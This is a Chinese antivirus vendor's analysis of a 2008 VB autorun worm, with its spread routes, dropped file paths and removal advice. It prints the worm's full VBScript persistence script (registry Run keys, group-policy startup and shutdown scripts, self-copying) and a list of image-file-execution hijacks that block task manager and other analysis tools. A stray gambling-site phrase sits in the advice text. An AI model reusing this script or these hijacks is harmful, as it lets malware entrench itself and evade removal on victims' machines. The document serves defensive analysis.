捕获时间
2008-11-6
病毒摘要
该样本是使用“ vb”编写的蠕虫程序,由微点主动防御软件自动捕获,长度为“225,280 字节”,未加壳,图标为,使用“exe”扩展名,通过“网页木马”、“移动存储介质”、“压缩包感染”、“ 局域网传播”等途径植入用户计算机。
感染对象
windows 2000/windows xp/windows 2003
传播途径
网页木马、文件捆绑、移动存储介质
防范措施
已安装使用微点主动防御软件的用户,无须任何设置,微点主动防御将自动保护您的系统免受该病毒的入侵和破坏。无论您是否已经升级到最新版本,微点主动防御都能够有效清除该病毒。如果您没有将微点主动防御软件升级到最新版,微点主动防御软件在发现该病毒后将报警提示您发现“未知木马”,请直接选择删除处理(如图1);
图1 主动防御自动捕获未知病毒(未升级)
如果您已经将微点主动防御软件升级到最新版本,微点将报警提示您发现"worm.win32.autorun.ibq”,请直接选择删除(如图2)。
图2 升级后截获已知病毒
对于未使用微点主动防御软件的用户,微点反病毒专家建议:
1、不要在不明站点下载非官方版本的软件进行安装,避免病毒通过捆绑的方式进入您的系统。
2、尽快将您的杀毒软件特征库升级到最新版本进行查杀,并开启防火墙拦截网络异常访问,如依然有异常情况请注意及时与专业的安全软件厂商联系获取yb亚博全站首页的技术支持。
3、开启windows自动更新,及时打好漏洞补丁。
病毒分析
该样本程序被执行后,拷贝自身(均为系统、隐藏、只读属性)到:
%systemroot%\fonts\fonts.exe
%systemroot%\fonts\tskmgr.exe
%systemroot%\help\microsoft.hlp
%systemroot%\media\rndll32.pif
%systemroot%\pchealth\helpctr\binaries\helphost.com
%systemroot%\pchealth\global.exe
%systemroot%\system\keyboard.exe
%systemroot%\system32\dllcache\recycler.{645ff040-5081-101b-9f08-00aa002f954e}\global.exe
%systemroot%\system32\dllcache\recycler.{645ff040-5081-101b-9f08-00aa002f954e}\svchost.exe
%systemroot%\system32\dllcache\recycler.{645ff040-5081-101b-9f08-00aa002f954e}\system.exe
%systemroot%\system32\dllcache\autorun.inf
%systemroot%\system32\dllcache\default.exe
%systemroot%\system32\dllcache\global.exe
%systemroot%\system32\dllcache\rndll32.exe
%systemroot%\system32\dllcache\tskmgr.exe
%systemroot%\system32\drivers\drivers.cab.exe
%systemroot%\system32\regedit.exe
并创建脚本文件:%systemroot%\cursors\boom.vbs,此脚本完成在中毒机器注销、关机、启动进行病毒文件复制及启动项的添加,其内容如下:
|
dim fs,rg
set fs = createobject("scripting.filesystemobject")
set rg = createobject("wscript.shell")
on error resume next
rg.regwrite "hkcr\.vbs\", "vbsfile"
rg.regwrite "hkcu\control panel\desktop\
scrnsave.exe"," c:\windows\pchealth\helpctr\binaries\helphost.com"
rg.regwrite "hkcu\control panel\desktop\screensavetimeout", "30"
rg.regwrite "hkcr\mscfile\shell\
open\command\", "c:\windows\pchealth\global.exe"
rg.regwrite "hkcr\regfile\shell\open\
command\", "c:\windows\pchealth\global.exe"
rg.regwrite "hklm\software\microsoft\windows\currentversion\
runonce\", "c:\windows\system32\dllcache\default.exe"
rg.regwrite "hkcu\software\microsoft\windows\currentversion\
runonce\", "c:\windows\system32\dllcache\default.exe"
rg.regwrite "hklm\software\microsoft\windows\currentversion\
run\", "c:\windows\system\keyboard.exe"
rg.regwrite "hkey_classes_root\mscfile\shell\open\
command\", "c:\windows\fonts\fonts.exe"
rg.regwrite "hkcu\software\policies\microsoft\windows\system\scripts\logoff\0\displayname","local group policy"
rg.regwrite "hkcu\software\policies\microsoft\windows\system\scripts\logoff\0\filesyspath",""
rg.regwrite "hkcu\software\policies\microsoft\windows\system\scripts\logoff\0\gpo-id","localgpo"
rg.regwrite "hkcu\software\policies\microsoft\windows\system\scripts\logoff\0\gponame","local group policy"
rg.regwrite "hkcu\software\policies\microsoft\windows\system\scripts\logoff\0\som-id","local"
rg.regwrite "hkcu\software\policies\microsoft\windows\system\scripts\logoff\0\0\parameters",""
rg.regwrite "hkcu\software\policies\microsoft\windows\system\scripts\logoff\0\0\script","c:\windows\cursors\boom.vbs"
rg.regwrite "hklm\software\policies\microsoft\windows\system\scripts\shutdown\0\displayname", "local group policy"
rg.regwrite "hklm\software\policies\microsoft\windows\system\scripts\shutdown\0\filesyspath", ""
rg.regwrite "hklm\software\policies\microsoft\windows\system\scripts\shutdown\0\gpo-id", "localgpo"
rg.regwrite "hklm\software\policies\microsoft\windows\system\scripts\shutdown\0\gponame", "local group policy"
rg.regwrite "hklm\software\policies\microsoft\windows\system\scripts\shutdown\0\som-id", "local"
rg.regwrite "hklm\software\policies\microsoft\windows\system\scripts\shutdown\0\0\parameters", ""
rg.regwrite "hklm\software\policies\microsoft\windows\system\scripts\shutdown\0\0\script", "c:\windows\cursors\boom.vbs"
rg.regwrite "hklm\software\policies\microsoft\windows\system\scripts\startup\0\displayname", "local group policy"
rg.regwrite "hklm\software\policies\microsoft\windows\system\scripts\startup\0\filesyspath", ""
rg.regwrite "hklm\software\policies\microsoft\windows\system\scripts\startup\0\gpo-id", "localgpo"
rg.regwrite "hklm\software\policies\microsoft\windows\system\scripts\startup\0\gponame", "local group policy"
rg.regwrite "hklm\software\policies\microsoft\windows\system\scripts\startup\0\som-id", "local"
rg.regwrite "hklm\software\policies\microsoft\windows\system\scripts\startup\0\0\parameters", ""
rg.regwrite "hklm\software\policies\microsoft\windows\system\scripts\startup\0\0\script", "c:\windows\cursors\boom.vbs"
if not fs.fileexists("c:\windows\fonts\fonts.exe") then
fs.copyfile ("c:\windows\help\microsoft.hlp"), ("c:\windows\fonts\fonts.exe")
if not fs.fileexists("c:\windows\pchealth\helpctr\binaries\helphost.com")
then fs.copyfile ("c:\windows\help\
microsoft.hlp"), ("c:\windows\pchealth\helpctr\binaries\helphost.com")
if not fs.fileexists("c:\windows\pchealth\global.exe") then
fs.copyfile ("c:\windows\help\microsoft.hlp"), ("c:\windows\pchealth\global.exe")
if not fs.fileexists("c:\windows\system\keyboard.exe")
then fs.copyfile ("c:\windows\help\
microsoft.hlp"), ("c:\windows\system\keyboard.exe")
if not fs.fileexists("c:\windows\system32\dllcache\default.exe") then
fs.copyfile
("c:\windows\help\microsoft.hlp"), ("c:\windows\system32\dllcache\default.exe")
if not fs.fileexists("c:\windows\system32\drivers\drivers.cab.exe") then
fs.copyfile ("c:\windows\help\
microsoft.hlp"), ("c:\windows\system32\drivers\drivers.cab.exe ")
if not fs.fileexists("c:\windows\media\rndll32.pif ") then
fs.copyfile ("c:\windows\help\microsoft.hlp"), ("c:\windows\media\
rndll32.pif")
if not fs.fileexists("c:\windows\fonts\tskmgr.exe") then
fs.copyfile("c:\windows\help\microsoft.hlp"), ("c:\windows\fonts\tskmgr.exe") |
|
并修改注册表实现隐藏自身,添加映像劫持,如下:
|
项:hkey_current_user\software\microsoft\windows\currentversion\explorer\advanced
键值:showsuperhidden
指向数据:0
项:
hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\auto.exe
键值:debugger
指向数据:c:\windows\system32\drivers\drivers.cab.exe
项:
hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\autorun.exe
键值:debugger
指向数据:c:\windows\system32\drivers\drivers.cab.exe
项:
hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\autoruns.exe
键值:debugger
指向数据:c:\windows\system32\drivers\drivers.cab.exe
项:
hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\boot.exe
键值:debugger
指向数据:c:\windows\fonts\fonts.exe
项:
hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ctfmon.exe
键值:debugger
指向数据:c:\windows\fonts\fonts.exe
项:
hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\msconfig.exe
键值:debugger
指向数据:c:\windows\media\rndll32.pif
项:
hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\procexp.exe
键值:debugger
指向数据:c:\windows\pchealth\helpctr\binaries\helphost.com
项:
hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\taskmgr.exe
键值:debugger
指向数据:c:\windows\fonts\tskmgr.exe |
|
病毒完全运行后创建“global.exe”、“svchost.exe”、“system.exe”进程,相互调用,达到进程不能被终止的效果,不断检测复制自身跟修改注册表,并不停遍历各磁盘查看是否有“autorun.inf”文件,如果有将其删除并写入新的“autorun.inf”,并拷贝自身名为“ms-dos”的文件,设置上述文件为“只读”、“系统”、“隐藏”属性。